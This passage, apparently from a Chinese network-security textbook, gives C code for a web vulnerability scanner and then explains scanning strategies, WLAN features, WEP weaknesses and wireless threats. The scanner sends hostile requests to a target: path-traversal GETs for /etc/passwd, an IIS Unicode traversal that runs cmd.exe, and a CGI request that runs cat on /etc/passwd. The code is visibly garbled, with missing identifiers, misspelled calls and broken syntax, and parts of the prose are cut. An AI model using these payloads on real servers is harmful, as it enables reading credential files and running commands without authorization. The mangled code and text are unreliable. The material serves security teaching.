【正文】 D wVersionRequested。SOCKET sock。char buff[1024]。 /*緩沖區(qū)*/char *ex[10]。ex[1]=GET /../../../../etc/passwd HTTP/\n\n。ex[2]=GET/scripts/..%c1%1c../winnt/system32/?/c+dir+c:\HTTP/\n\n。ex[3]=GET /\n\n。ex[4]=GET /cgibin/?/../../../../etc/motd HTTP/ \n\n。ex[5]=GET /cgibin/testcgi?\helpamp。0a/bin/cat%20/etc/passwd HTTP/ \n\n。ex[6]=GET /cgibin/testcgi?* HTTP/\n\n。char *fmsg=HTTP/ 200 OK。wVersionRequested = MAKEWORD( 1, 1 )。if (WSAStartup(wVersionRequested , amp。minData)){ printf(Winsock Initialization failed.\n)。 exit(1)。}if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf(Can not create socket.\n)。 exit(1)。}sock = socket(AF_INET,SOCK_STREAM,0)。 /*創(chuàng)建用于監(jiān)聽的套接字*/ = AF_INET。 /*設(shè)置地址結(jié)構(gòu)遵循TCP/IP協(xié)議*/ = htons(80)。= inet_addr(argv[1])。if ((he=gethostbyname(argv[1]))!=NULL){ memcpy((char *)amp。,heh_addr,heh_length)。}else{ if((=inet_addr(argv[1]))==1){ WSACleanup()。 exit(1)。 }}for (i=1 。 i7。 i++) { if (connectsock,(struct sockaddr*)amp。bo,sizeof(bo))==0){ send(sock,ex[i],strlen(ex[i]),0)。 recv(sock,buff,sizeof(buff),0)。 if(strstr(buff,fmsg)!=NULL){ printf(\nFound :%s/n, ex[i])。 } } colsesocket(sock)。 /*關(guān)閉監(jiān)聽套接字*/ WASCleanup()。 return(1)。 }}提示：編寫漏洞掃描器探查遠(yuǎn)程服務(wù)器上可能存在的具有安全隱患的文件是否存在時(shí)，通常用socket建立過程，使用80端口，對(duì)這個(gè)端口發(fā)送一個(gè)GET文件的請(qǐng)求服務(wù)器接收到請(qǐng)求會(huì)返回文件內(nèi)容，如果文件不存在則返回一個(gè)錯(cuò)誤提示，通過接收返回內(nèi)容可以判斷文件是否存在。發(fā)送和接收數(shù)據(jù)需要使用函數(shù) send() 和 recv()，其中對(duì)流中存在的字符串進(jìn)行判斷需要使用函數(shù) strstr()。掃描器應(yīng)該有三項(xiàng)能力：發(fā)現(xiàn)一個(gè)主機(jī)的網(wǎng)絡(luò)的能力；發(fā)現(xiàn)什么服務(wù)正在主機(jī)上運(yùn)行的能力；發(fā)現(xiàn)服務(wù)漏洞的能力。 漏洞掃描通常采用兩種策略，第一種是被動(dòng)式策略，第二種是主動(dòng)式策略。所謂被動(dòng)式策略就是基于主機(jī)之上，對(duì)系統(tǒng)中不合適的設(shè)置、脆弱的口令以及其他與安全規(guī)則抵觸的對(duì)象進(jìn)行檢查。而主動(dòng)式策略是基于網(wǎng)絡(luò)的，它通過執(zhí)行一些腳本文件模擬對(duì)系統(tǒng)進(jìn)行攻擊的行為并記錄系統(tǒng)的反應(yīng)，從而發(fā)現(xiàn)其中的漏洞。利用被動(dòng)式策略的掃描稱為系統(tǒng)安全掃描，利用主動(dòng)式的策略掃描稱為網(wǎng)絡(luò)安全掃描。漏洞掃描歸納起來主要有4種技術(shù)：。它采用被動(dòng)的、非破壞性的辦法檢查應(yīng)用軟件包的設(shè)置，發(fā)現(xiàn)安全漏洞。它采用被動(dòng)的、非破壞性的辦法對(duì)系統(tǒng)進(jìn)行檢測。通常，它涉及到系統(tǒng)的內(nèi)核、文件的屬性、操作系統(tǒng)的補(bǔ)丁等。這種技術(shù)還包括口令解密、把一些簡單的口令剔除。因此，這種技術(shù)可以非常準(zhǔn)確地定位系統(tǒng)的問題，發(fā)現(xiàn)系統(tǒng)的漏洞。它的缺點(diǎn)是與平臺(tái)相關(guān)，升級(jí)復(fù)雜。它采用被動(dòng)的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性，如數(shù)據(jù)庫、注冊(cè)號(hào)等。通過消息文摘算法，對(duì)文件的加密數(shù)進(jìn)行檢驗(yàn)。這種技術(shù)的實(shí)現(xiàn)是運(yùn)行在一個(gè)閉環(huán)上，不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性，然后產(chǎn)生檢驗(yàn)數(shù)，把這些檢驗(yàn)數(shù)同原來的檢驗(yàn)數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。4. 基于網(wǎng)絡(luò)的檢測技術(shù)。它采用積極的、非破壞性的辦法來檢驗(yàn)系統(tǒng)是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對(duì)系統(tǒng)進(jìn)行攻擊的行為，然后對(duì)結(jié)果進(jìn)行分析。它還針對(duì)已知的網(wǎng)絡(luò)漏洞進(jìn)行檢驗(yàn)。網(wǎng)絡(luò)檢測技術(shù)常被用來進(jìn)行穿透實(shí)驗(yàn)和安全審記。這種技術(shù)可以發(fā)現(xiàn)一系列平臺(tái)的漏洞，也容易安裝。但是，它可能會(huì)影響網(wǎng)絡(luò)的性能。第七章無線網(wǎng)絡(luò)安全實(shí)戰(zhàn) 近年來，隨著筆記本電腦和個(gè)人數(shù)字代理（PDA）以及家電數(shù)字化等技術(shù)的發(fā)展，人們利用信息技術(shù)進(jìn)行通信聯(lián)系和信息交流的空間和靈活性不斷拓展。無線網(wǎng)絡(luò)成為技術(shù)發(fā)展和社會(huì)應(yīng)用的新寵，受到全社會(huì)的普遍歡迎，同時(shí)也成為網(wǎng)絡(luò)發(fā)展商們爭相搶占的新領(lǐng)域。計(jì)算機(jī)通信網(wǎng)絡(luò)隨著互聯(lián)網(wǎng)技術(shù)的飛速發(fā)展而發(fā)展,從傳統(tǒng)的有線網(wǎng)絡(luò)發(fā)展到今天的無線網(wǎng)絡(luò),作為無線網(wǎng)絡(luò)主要網(wǎng)絡(luò)之一的無線局域網(wǎng)WLAN(Wireless Local Network),滿足了人們實(shí)現(xiàn)移動(dòng)辦公的夢(mèng)想，為用戶創(chuàng)造了一個(gè)豐富多彩的自由天空，讓人能夠真正體會(huì)到網(wǎng)絡(luò)無處不在的奇妙感覺。　　WLAN是利用無線通信技術(shù)在一定的局部范圍內(nèi)建立的網(wǎng)絡(luò)，是計(jì)算機(jī)網(wǎng)絡(luò)與無線通信技術(shù)相結(jié)合的產(chǎn)物，它以無線多址信道作為傳輸媒介，提供傳統(tǒng)有線局域網(wǎng)LAN（LocalAreaNetwork）的功能，能夠使用戶真正實(shí)現(xiàn)隨時(shí)、隨地、隨意的寬帶網(wǎng)絡(luò)接入。2．WLAN的特點(diǎn) WLAN開始是作為有線局域網(wǎng)絡(luò)地延伸而存在的，各團(tuán)體、企事業(yè)單位廣泛地采用了WLAN技術(shù)來構(gòu)建其辦公網(wǎng)絡(luò)。但隨著應(yīng)用的進(jìn)一步發(fā)展，WLAN正逐漸從傳統(tǒng)意義上的局域網(wǎng)技術(shù)發(fā)展成為公共無線局域網(wǎng)，成為國際互聯(lián)網(wǎng)INTERNET寬帶接入手段。主要是因?yàn)闊o線局域網(wǎng)具有如下特點(diǎn)：（1）具有高移動(dòng)性，通信范圍不受環(huán)境條件的限制，拓寬了網(wǎng)絡(luò)傳輸范圍。（2）安全性能強(qiáng)，無線局域網(wǎng)采取網(wǎng)絡(luò)隔離及網(wǎng)絡(luò)認(rèn)證措施；無線局域網(wǎng)設(shè)置有嚴(yán)密的用戶口令及認(rèn)證措施，防止非法用戶入侵；無線局域網(wǎng)設(shè)置附加的第三份數(shù)據(jù)加密方案，即使信號(hào)被盜聽也難以理解其中的內(nèi)容。對(duì)于有線局域網(wǎng)中的諸多安全問題，在無線局域網(wǎng)中基本上可以避免。（3）擴(kuò)展能力強(qiáng)，在已有無線網(wǎng)絡(luò)的基礎(chǔ)上，只需通過增加AP（無線接入點(diǎn)）及相應(yīng)的軟件設(shè)置即可對(duì)現(xiàn)有網(wǎng)絡(luò)進(jìn)行有效擴(kuò)展。無線網(wǎng)絡(luò)的易擴(kuò)展性是有線網(wǎng)絡(luò)所不能比擬的。（4）建網(wǎng)容易，管理方便。相對(duì)于有線網(wǎng)絡(luò)，無線局域網(wǎng)的組建、配置和維護(hù)較為容易，一般計(jì)算機(jī)工作人員都可以勝任網(wǎng)絡(luò)的管理工作。（5）組網(wǎng)速度快，工程周期短。無線擴(kuò)頻通信可在數(shù)十分鐘內(nèi)迅速組建起通信鏈路，實(shí)現(xiàn)臨時(shí)、應(yīng)急、抗災(zāi)等特殊情況的網(wǎng)絡(luò)通信需求，而有線通信則需要較長時(shí)間。（6）開發(fā)運(yùn)營成本低。無線局域網(wǎng)在人們印象中式價(jià)格昂貴的，但實(shí)際上，在購買時(shí)不能只考慮設(shè)備價(jià)格，因?yàn)闊o線局域網(wǎng)可以在其他方面降低成本。有線通信的開通必須假設(shè)電纜，挖掘電纜溝或架設(shè)架空明線；而架設(shè)無線鏈路則無須架線挖溝，線路開通速度快。如果將所有成本和工程周期統(tǒng)籌考慮，無線網(wǎng)絡(luò)組建的投資是相當(dāng)節(jié)省的。使用無線局域網(wǎng)不僅可以減少對(duì)布線的需求和與布線相關(guān)的一些開支，還可以為用戶提供靈活性更高、移動(dòng)性更強(qiáng)的信息獲取方法。（7）受自然環(huán)境、地形及災(zāi)害影響小。有線通信除電信部門外，其他單位的通信系統(tǒng)沒有在城區(qū)挖溝鋪設(shè)電纜的權(quán)力，而無線通信方式則可根據(jù)客戶需求靈活定制專網(wǎng)。有線通信受地勢(shì)影響，不能任意鋪設(shè)；而無線通信覆蓋范圍大，幾乎不受地理環(huán)境限制。3．無線局域網(wǎng)的應(yīng)用 WLAN作為有線網(wǎng)絡(luò)無線延伸，可以廣泛應(yīng)用在生活社區(qū)、游樂園、旅館、機(jī)場車站等游玩區(qū)域?qū)崿F(xiàn)旅游休閑上網(wǎng)；可以應(yīng)用在政府辦公大樓、校園、企事業(yè)等單位實(shí)現(xiàn)移動(dòng)辦公，方便開會(huì)及上課等；可以應(yīng)用在醫(yī)療、金融證券等方面，實(shí)現(xiàn)醫(yī)生在路途中對(duì)病人進(jìn)行網(wǎng)上診斷，實(shí)現(xiàn)金融證券室外網(wǎng)上交易。對(duì)于難于布線的環(huán)境，如老式建筑、沙漠區(qū)域等，對(duì)于頻繁變化的環(huán)境，如各種展覽大樓；對(duì)于臨時(shí)需要的寬帶接入、流動(dòng)工作站等，建立WLAN都是理想的選擇。（1）大樓之間：大樓之間建構(gòu)網(wǎng)絡(luò)的連結(jié)，取代專線，簡單又便宜。 （2）餐飲及零售：餐飲服務(wù)業(yè)可使用無線局域網(wǎng)絡(luò)產(chǎn)品，直接從餐桌即可輸入并傳送客人點(diǎn)菜內(nèi)容至廚房、柜臺(tái)。零售商促銷時(shí)，可使用無線局域網(wǎng)絡(luò)產(chǎn)品設(shè)置臨時(shí)收銀柜臺(tái)。 （3）醫(yī)療：使用附無線局域網(wǎng)絡(luò)產(chǎn)品的手提式計(jì)算機(jī)取得實(shí)時(shí)信息，醫(yī)護(hù)人員可藉此避免對(duì)傷患救治的遲延、不必要的紙上作業(yè)、單據(jù)循環(huán)的遲延及誤診等，而提升對(duì)傷患照顧的品質(zhì)。（4）企業(yè)：當(dāng)企業(yè)內(nèi)的員工使用無線局域網(wǎng)絡(luò)產(chǎn)品時(shí)，不管他們?cè)谵k公室的任何一個(gè)角落，有無線局域網(wǎng)絡(luò)產(chǎn)品，就能隨意地發(fā)電子郵件、分享檔案及上網(wǎng)絡(luò)瀏覽。（5）倉儲(chǔ)管理：一般倉儲(chǔ)人員的盤點(diǎn)事宜，透過無線網(wǎng)絡(luò)的應(yīng)用，能立即將最新的資料輸入計(jì)算機(jī)倉儲(chǔ)系統(tǒng)。（6）貨柜集散場：一般貨柜集散場的橋式起重車，可于調(diào)動(dòng)貨柜時(shí)，將實(shí)時(shí)信息傳回office，以利相關(guān)作業(yè)之逐行。（7）監(jiān)視系統(tǒng)：一般位于遠(yuǎn)方且需受監(jiān)控現(xiàn)場之場所，由于布線之困難，可藉由無線網(wǎng)絡(luò)將遠(yuǎn)方之影像傳回主控站。（8）展示會(huì)場：諸如一般的電子展，計(jì)算機(jī)展，由于網(wǎng)絡(luò)需求極高，而且布線又會(huì)讓會(huì)場顯得凌亂，因此若能使用無線網(wǎng)絡(luò)，則是再好不過的選擇。一、無線局域網(wǎng)安全現(xiàn)狀　　WLAN開始是作為有線局域網(wǎng)的延伸而存在的，各團(tuán)體、企事業(yè)單位廣泛地采用了WLAN技術(shù)來構(gòu)建其辦公網(wǎng)絡(luò)。隨著應(yīng)用的進(jìn)一步發(fā)展，WLAN正逐漸從傳統(tǒng)意義上的局域網(wǎng)技術(shù)發(fā)展成為“公共無線局域網(wǎng)”，成為國際互聯(lián)網(wǎng)寬帶接入手段。無線局域網(wǎng)之間傳遞消息不依賴于物理布線，這無疑給用戶帶來了極大的方便，但同時(shí)也使得無線局域網(wǎng)比傳統(tǒng)局域網(wǎng)面臨更多的安全威脅。而無線網(wǎng)絡(luò)安全問題，主要表現(xiàn)在如下幾個(gè)方面的問題?！?1)WEP密鑰的發(fā)布問題　　。，而在實(shí)際應(yīng)用中，一般都是手工設(shè)置，并長期固定使用4個(gè)可選密鑰之一。因此，當(dāng)工作站點(diǎn)增多時(shí)，手工方法的配置和管理將十分煩瑣并效率低下，而且密鑰一旦丟失，WLAN將無安全性可言。(2)WEP用戶身份認(rèn)證方法的缺陷　　：開放系統(tǒng)認(rèn)證和共享密鑰認(rèn)證。前者是默認(rèn)的認(rèn)證方法，任何移動(dòng)站點(diǎn)都可加入BSS(Basic Service Set，基本服務(wù)集)，并可以跟AP(Access Point，接入點(diǎn))通信，能“聽到”所有未加密的數(shù)據(jù)，可見，這種方法根本沒有提供認(rèn)證，當(dāng)然，也就不存在安全性。后者是一種請(qǐng)求響應(yīng)認(rèn)證機(jī)制：AP在收到工作站點(diǎn)STA的請(qǐng)求接入消息時(shí)發(fā)送詢問消息，STA對(duì)詢問消息使用共享密鑰進(jìn)行加密并送回AP，AP解密并校驗(yàn)消息的完整性，若成功，則允許STA接入WLAN。攻擊者只需抓住加密前后的詢問消息，加以簡單的數(shù)學(xué)運(yùn)算就可得到共享密鑰生成的偽隨機(jī)密碼流，然后偽造合法的響應(yīng)消息通過AP認(rèn)證后接入WLAN。 (3)WEP服務(wù)集標(biāo)識(shí)SSID和MAC地址過濾　　WEP服務(wù)集標(biāo)識(shí)SSID由Lucent公司提出，用以對(duì)封閉網(wǎng)絡(luò)進(jìn)行訪問控制。只有與AP有相同的SSID的客戶站點(diǎn)才允許訪問WLAN。MAC地址過濾的想法是AP中存有合法客戶站點(diǎn)的MAC地址列表，拒絕MAC地址不在列表中的站點(diǎn)接入被保護(hù)的網(wǎng)絡(luò)。但由于SSID和MAC地址很容易被竊取，因此安全性較低?！?4)WEP加密機(jī)制的天生脆弱性　　WEP加密機(jī)制的天生脆弱性是受網(wǎng)絡(luò)攻擊的最主要原因，目前，消除WEP算法安全性方面缺陷的工作正在加緊進(jìn)行，其中IEEE Group ，它對(duì)現(xiàn)有系統(tǒng)改進(jìn)相對(duì)較小并易于實(shí)現(xiàn)。二、無線局域網(wǎng)的安全威脅　　現(xiàn)在，除了有線網(wǎng)絡(luò)常見的網(wǎng)絡(luò)安全威脅以外，無線網(wǎng)絡(luò)安全的威脅也越來越多，作為工作人員如何發(fā)現(xiàn)存在的威脅，并如何做處理時(shí)，張先生的書中也作了詳細(xì)的的回答，主要有以下方面：　(1)私接AP　　無線局域網(wǎng)接入點(diǎn)(WLAN AP)是便宜的，容易安裝，小巧而容易攜帶。非法的WLAN AP可以無意地或者在IT管理人員無法察覺的情況下惡意地接入到企業(yè)網(wǎng)絡(luò)。只需要把一個(gè)小巧的WLAN AP帶到企業(yè)內(nèi)部，然后連接到以太網(wǎng)接口上就行了。(2)不當(dāng)設(shè)置的AP　　WLAN AP支持多種安全特性和設(shè)置。許多時(shí)候，IT管理人員都會(huì)讓合法的AP仍舊保持出廠時(shí)的默認(rèn)設(shè)置或者沒有恰當(dāng)?shù)貙?duì)它進(jìn)行設(shè)置，這會(huì)使AP在沒有加密或在弱加密(如WEP)的條件下工作。也有些時(shí)候，一個(gè)AP在沒有設(shè)置任何口令的情況下與客戶端連接，于是整個(gè)企業(yè)網(wǎng)絡(luò)就都在沒有任何口令情況下建立了無線連接?！?3)客戶端不當(dāng)連接　　客戶端不當(dāng)連接就是企業(yè)內(nèi)合法用戶與外部AP建立連接，也存在不安全因素，這又怎樣發(fā)生的呢?一些部署在工作區(qū)周圍的AP可能沒有做任何安全控制，企業(yè)內(nèi)的合法用戶的WiFi卡就可能與這些外部AP建立連接。一旦這個(gè)客戶端連接到外部AP，企業(yè)內(nèi)可信賴的網(wǎng)絡(luò)就置于風(fēng)險(xiǎn)之中，外部不安全的連接通過這個(gè)客戶端就接入到了用戶的網(wǎng)絡(luò)。因此，要防止在不知情的狀況下發(fā)生合法用戶與外部AP建立連接或內(nèi)部信息外露的情況。(4)非法連接　　非法連接是指企業(yè)外的人員與企業(yè)內(nèi)合法的AP建立連接，這通常發(fā)生在無線空間沒有安全控制的情況下。如果一個(gè)非法用戶與合法AP建立連接，就意味著用戶的網(wǎng)絡(luò)向外部開放了，這會(huì)導(dǎo)致重要數(shù)據(jù)和信息外泄。(5)直連網(wǎng)絡(luò)　　 WLAN標(biāo)準(zhǔn)提供一種在無線客戶端間建立點(diǎn)對(duì)點(diǎn)無線連接的方式。無線客戶端之間可以借此建立一個(gè)直連網(wǎng)絡(luò)(Ad Hoc)。但是，這種直連網(wǎng)絡(luò)帶來了安全漏洞，攻擊者可以在網(wǎng)絡(luò)周邊隱藏區(qū)內(nèi)與企業(yè)內(nèi)一個(gè)合法的筆記本電腦建立無線連接。比如：如果這臺(tái)